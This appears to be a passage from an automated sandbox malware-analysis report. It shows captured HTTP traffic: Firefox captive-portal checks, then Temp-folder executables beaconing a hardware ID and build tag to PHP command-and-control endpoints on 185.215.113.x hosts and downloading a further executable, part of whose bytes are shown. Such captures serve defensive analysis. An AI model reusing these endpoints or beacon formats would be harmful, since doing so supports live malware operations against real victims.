Nov 4, 2024 17:33:38.439814091 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Mon, 04 Nov 2024 00:03:27 GMT Age: 59411 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Nov 4, 2024 17:33:48.451246023 CET	6	OUT	Data Raw: 00 Data Ascii:
Nov 4, 2024 17:33:48.961009979 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Nov 4, 2024 17:33:49.090559006 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Mon, 04 Nov 2024 00:03:27 GMT Age: 59422 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Nov 4, 2024 17:33:59.150070906 CET	6	OUT	Data Raw: 00 Data Ascii:
Nov 4, 2024 17:33:59.859586000 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Nov 4, 2024 17:33:59.994043112 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Mon, 04 Nov 2024 00:03:27 GMT Age: 59432 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Nov 4, 2024 17:34:00.943428040 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Nov 4, 2024 17:34:01.072565079 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Mon, 04 Nov 2024 00:03:27 GMT Age: 59434 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Nov 4, 2024 17:34:01.565932035 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Nov 4, 2024 17:34:01.695173025 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Mon, 04 Nov 2024 00:03:27 GMT Age: 59434 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Nov 4, 2024 17:34:10.452650070 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Nov 4, 2024 17:34:10.583070040 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Mon, 04 Nov 2024 00:03:27 GMT Age: 59443 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Nov 4, 2024 17:34:20.642550945 CET	6	OUT	Data Raw: 00 Data Ascii:
Nov 4, 2024 17:34:30.745477915 CET	6	OUT	Data Raw: 00 Data Ascii:
Nov 4, 2024 17:34:31.667376995 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Nov 4, 2024 17:34:31.797287941 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Mon, 04 Nov 2024 00:03:27 GMT Age: 59464 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Nov 4, 2024 17:34:31.893867970 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Nov 4, 2024 17:34:32.025168896 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Mon, 04 Nov 2024 00:03:27 GMT Age: 59464 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Nov 4, 2024 17:34:42.056941986 CET	6	OUT	Data Raw: 00 Data Ascii:
Nov 4, 2024 17:34:51.415360928 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Nov 4, 2024 17:34:51.545100927 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Mon, 04 Nov 2024 00:03:27 GMT Age: 59484 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Nov 4, 2024 17:35:01.553095102 CET	6	OUT	Data Raw: 00 Data Ascii:
Nov 4, 2024 17:35:11.653451920 CET	6	OUT	Data Raw: 00 Data Ascii:
Nov 4, 2024 17:35:21.752240896 CET	6	OUT	Data Raw: 00 Data Ascii:
Nov 4, 2024 17:35:31.852751017 CET	6	OUT	Data Raw: 00 Data Ascii:
Nov 4, 2024 17:35:41.954488993 CET	6	OUT	Data Raw: 00 Data Ascii:
Nov 4, 2024 17:36:12.085028887 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Nov 4, 2024 17:36:12.214548111 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Mon, 04 Nov 2024 00:03:27 GMT Age: 59565 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.5	50204	185.215.113.206	80	7892	C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:33:32.252198935 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Nov 4, 2024 17:33:33.173552036 CET	203	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:33:33 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 4, 2024 17:33:33.188700914 CET	413	OUT	POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CFCBAAEBKEGHIEBFIJJK Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 46 43 42 41 41 45 42 4b 45 47 48 49 45 42 46 49 4a 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 42 42 43 38 34 33 45 42 33 35 39 32 33 39 38 39 38 39 30 30 39 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 42 41 41 45 42 4b 45 47 48 49 45 42 46 49 4a 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 42 41 41 45 42 4b 45 47 48 49 45 42 46 49 4a 4a 4b 2d 2d 0d 0a Data Ascii: ------CFCBAAEBKEGHIEBFIJJKContent-Disposition: form-data; name="hwid"EBBC843EB3592398989009------CFCBAAEBKEGHIEBFIJJKContent-Disposition: form-data; name="build"tale------CFCBAAEBKEGHIEBFIJJK--
Nov 4, 2024 17:33:33.471721888 CET	210	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:33:33 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.5	50214	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:33:34.379456997 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 39 37 34 42 38 35 41 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB42974B85A82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 4, 2024 17:33:35.325304985 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:33:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.5	50215	185.215.113.206	80	7572	C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:33:36.135099888 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Nov 4, 2024 17:33:37.037173986 CET	203	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:33:36 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 4, 2024 17:33:37.040127993 CET	413	OUT	POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HDHCFIJEGCAKJJKEHJJE Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 44 48 43 46 49 4a 45 47 43 41 4b 4a 4a 4b 45 48 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 42 42 43 38 34 33 45 42 33 35 39 32 33 39 38 39 38 39 30 30 39 0d 0a 2d 2d 2d 2d 2d 2d 48 44 48 43 46 49 4a 45 47 43 41 4b 4a 4a 4b 45 48 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 48 44 48 43 46 49 4a 45 47 43 41 4b 4a 4a 4b 45 48 4a 4a 45 2d 2d 0d 0a Data Ascii: ------HDHCFIJEGCAKJJKEHJJEContent-Disposition: form-data; name="hwid"EBBC843EB3592398989009------HDHCFIJEGCAKJJKEHJJEContent-Disposition: form-data; name="build"tale------HDHCFIJEGCAKJJKEHJJE--
Nov 4, 2024 17:33:37.319395065 CET	210	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:33:37 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.5	50217	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:33:36.959857941 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 4, 2024 17:33:37.862498999 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:33:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.5	50219	185.215.113.206	80	1120	C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:33:37.744193077 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Nov 4, 2024 17:33:38.663774967 CET	203	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:33:38 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 4, 2024 17:33:38.668273926 CET	413	OUT	POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AFIDGDBGCAAFIDHIJKEH Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 46 49 44 47 44 42 47 43 41 41 46 49 44 48 49 4a 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 42 42 43 38 34 33 45 42 33 35 39 32 33 39 38 39 38 39 30 30 39 0d 0a 2d 2d 2d 2d 2d 2d 41 46 49 44 47 44 42 47 43 41 41 46 49 44 48 49 4a 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 41 46 49 44 47 44 42 47 43 41 41 46 49 44 48 49 4a 4b 45 48 2d 2d 0d 0a Data Ascii: ------AFIDGDBGCAAFIDHIJKEHContent-Disposition: form-data; name="hwid"EBBC843EB3592398989009------AFIDGDBGCAAFIDHIJKEHContent-Disposition: form-data; name="build"tale------AFIDGDBGCAAFIDHIJKEH--
Nov 4, 2024 17:33:38.955547094 CET	210	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:33:38 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.5	50222	185.215.113.16	80	7784	C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:33:39.018368006 CET	205	OUT	GET /steam/random.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: 185.215.113.16
Nov 4, 2024 17:33:39.930346966 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:33:39 GMT Content-Type: application/octet-stream Content-Length: 2124288 Last-Modified: Mon, 04 Nov 2024 16:30:39 GMT Connection: keep-alive ETag: "6728f6af-206a00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 62 9b 7d e6 03 f5 2e e6 03 f5 2e e6 03 f5 2e 89 75 5e 2e fe 03 f5 2e 89 75 6b 2e eb 03 f5 2e 89 75 5f 2e dc 03 f5 2e ef 7b 76 2e e5 03 f5 2e 66 7a f4 2f e4 03 f5 2e ef 7b 66 2e e1 03 f5 2e e6 03 f4 2e 89 03 f5 2e 89 75 5a 2e f4 03 f5 2e 89 75 68 2e e7 03 f5 2e 52 69 63 68 e6 03 f5 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 38 6e 1e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 d0 01 00 00 dc 2c 00 00 00 00 00 00 20 72 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 50 72 00 00 04 00 00 c1 20 21 00 02 00 40 80 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$b}...u^..uk..u_..{v..fz/.{f....uZ..uh..Rich.PEL8ng, r@Pr !@P.d. p.v@.rsrc .@.idata .@ ).@fawplrfxPX@jtmuhxjqrB @.taggant0 r"H @
Nov 4, 2024 17:33:39.930380106 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 4, 2024 17:33:39.930392027 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 4, 2024 17:33:39.930402994 CET	336	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 4, 2024 17:33:39.930422068 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 4, 2024 17:33:39.930470943 CET	1236	IN	Data Raw: 21 ef 03 b8 01 98 bb 95 b1 72 2c 87 39 ae 29 14 6f ff a9 29 ce 97 ae 72 79 c7 c2 f4 b0 a8 2b 14 9a 6b 4e eb b0 23 04 28 9a 6b 90 d8 b0 23 04 2c 9a 6c ba be b0 04 b2 16 be ef 69 20 d2 a6 31 78 2c c8 09 55 36 6c fe c5 e8 4d 29 15 cc 7b 70 25 08 9b Data Ascii: !r,9)o)ry+kN#(k#,li 1x,U6lM){p%43_D(,^njzxL Nd&k}L_+l6C0%_@,;`_r2_t2O',_40"4-4&ec`KSzf'\|
Nov 4, 2024 17:33:39.930483103 CET	1236	IN	Data Raw: d3 b1 1b 43 70 40 18 20 76 7a 08 01 a3 19 50 14 9f 11 a3 d1 e0 b2 9a 70 30 c0 e2 f7 19 4c 38 75 1e 47 31 9d 15 f5 3c 4c f9 aa e2 f1 14 a6 38 0b ec 23 2d 14 a8 83 8e 27 16 ca d9 34 31 f1 c0 a4 01 81 79 2a fb ef de ed 86 1a 5e 07 33 64 a5 89 5f d0 Data Ascii: Cp@ vzPp0L8uG1<L8#-'41y*^3d_"o8\O`vV{(0"Rr4QOE")RW? (J44j\|z;E1+\|0/aRy&BL%f0b9"g,@j3`aT("-t!
Nov 4, 2024 17:33:39.930495024 CET	1236	IN	Data Raw: 8e 25 d4 51 27 83 33 b1 29 c3 64 7b 2f af fe 49 32 6b 9c 95 da f3 08 9a fd a0 33 48 96 12 c0 23 a6 5e 74 b1 26 e3 1b 5e 9c f0 97 b8 a9 0f 2b 52 c6 c6 06 99 95 11 ad 46 8b af 2a 9c e1 cb 52 38 ce c6 34 38 7e a0 65 c0 00 ae ae 53 7d 2d e4 28 2e 73 Data Ascii: %Q'3)d{/I2k3H#^t&^+RFR848~eS}-(.s(G_f)B#!)-^3.)h(O0RN}U0+aS+R#o.l'`!8a#*S`'-)2U_W2)^vte'>/:C
Nov 4, 2024 17:33:39.930529118 CET	848	IN	Data Raw: a6 a3 73 5d bb ee e1 20 ce af 48 96 ef 13 2b 31 c6 97 a3 97 c3 85 fc 76 27 2f 1c a0 a1 ea 56 22 ce 13 16 eb a5 2b 2b b0 04 1f c0 03 00 fb 65 ac 1f a0 03 3d 02 9e 55 fc a6 b5 0e 19 20 a0 25 48 3a 14 82 b6 ed 4f 2b c0 a1 c6 ba 16 17 8b 3e a9 1a 3f Data Ascii: s] H+1v'/V"++e=U %H:O+>?a)F60 )RHx'/!(>?')H^%0(+tY.1!I+PGP[!UtLI*pSA'oX'+6 "z"/p8^e
